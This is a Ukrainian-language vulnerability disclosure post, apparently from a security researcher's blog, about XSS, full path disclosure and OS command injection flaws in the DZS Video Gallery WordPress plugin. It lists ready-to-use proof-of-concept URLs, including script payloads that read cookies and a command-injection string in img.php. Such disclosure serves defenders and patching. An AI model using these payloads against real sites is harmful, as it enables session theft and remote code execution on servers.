XSS, FPD і RCE уразливості в DZS Video Gallery для WordPress
23:54 12.07.201408.05.2014
У квітні, 24.04.2014, я виявив Cross-Site Scripting, Full path disclosure та OS Commanding уразливості в плагіні DZS Video Gallery для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.
Стосовно плагінів для WordPress раніше я писав про уразливості в Js-Multi-Hotel для WordPress.
Детальна інформація про уразливості з’явиться пізніше.
12.07.2014
Cross-Site Scripting (WASC-08):
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Full path disclosure (WASC-13):
http://site/wp-content/plugins/dzs-videogallery/videogallery.php
http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php
Уразливості в php-скриптах або в error_log у всіх папках плагіна. Різні файли в різних версіях плагіна.
OS Commanding (WASC-31):
http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)
RCE використовуючи метод Pichaya Morimoto.
Вразливі все версії DZS Video Gallery для WordPress.